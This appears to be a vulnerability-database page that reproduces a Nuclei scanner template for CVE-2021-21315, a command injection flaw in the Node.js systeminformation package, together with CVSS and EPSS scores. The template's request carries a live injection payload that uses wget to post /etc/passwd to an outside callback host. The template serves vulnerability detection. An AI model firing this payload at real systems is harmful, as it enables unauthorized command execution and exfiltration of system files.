ProjectDiscoveryNUCLEI:CVE-2021-21315Node.JS System Information Library <5.3.1 - Remote Command Injection
7.8 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
7.8 High
AI Score
Confidence
High
4.6 Medium
CVSS2
Access Vector
LOCAL
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:L/AC:L/Au:N/C:P/I:P/A:P
0.972 High
EPSS
Percentile
99.8%
Node.JS System Information Library System before version 5.3.1 is susceptible to remote command injection. Node.JS (npm package “systeminformation”) is an open source collection of functions to retrieve detailed hardware, system and OS information.
id: CVE-2021-21315
info:
name: Node.JS System Information Library <5.3.1 - Remote Command Injection
author: pikpikcu
severity: high
description: Node.JS System Information Library System before version 5.3.1 is susceptible to remote command injection. Node.JS (npm package "systeminformation") is an open source collection of functions to retrieve detailed hardware, system and OS information.
impact: |
Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.
remediation: Upgrade to version 5.3.1. As a workaround instead of upgrading, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() ... do only allow strings, reject any arrays. String sanitation works as expected
reference:
- https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC
- https://security.netapp.com/advisory/ntap-20210312-0007/
- https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-2m8v-572m-ff2v
- https://www.npmjs.com/package/systeminformation
- https://nvd.nist.gov/vuln/detail/CVE-2021-21315
classification:
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.8
cve-id: CVE-2021-21315
cwe-id: CWE-78
epss-score: 0.97233
epss-percentile: 0.99827
cpe: cpe:2.3:a:systeminformation:systeminformation:*:*:*:*:*:node.js:*:*
metadata:
max-request: 1
vendor: systeminformation
product: systeminformation
framework: node.js
tags: cve,cve2021,nodejs,kev,systeminformation,node.js
http:
- method: GET
path:
- "{{BaseURL}}/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20{{interactsh-url}})"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "wget --post-file /etc/passwd {{interactsh-url}}"
- name
- running
- pids
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
# digest: 4a0a0047304502200c1047dcc90c189900f05fb35827af9ae07e546fd18b576cdf2fab02e506f6b4022100adf613b9c43079b8e63825c8282c41fd892e632b5fd81854a70bd1737ca542c1:922c64590222798bb761d5b6d8e72950Related
7.8 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
7.8 High
AI Score
Confidence
High
4.6 Medium
CVSS2
Access Vector
LOCAL
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:L/AC:L/Au:N/C:P/I:P/A:P
0.972 High
EPSS
Percentile
99.8%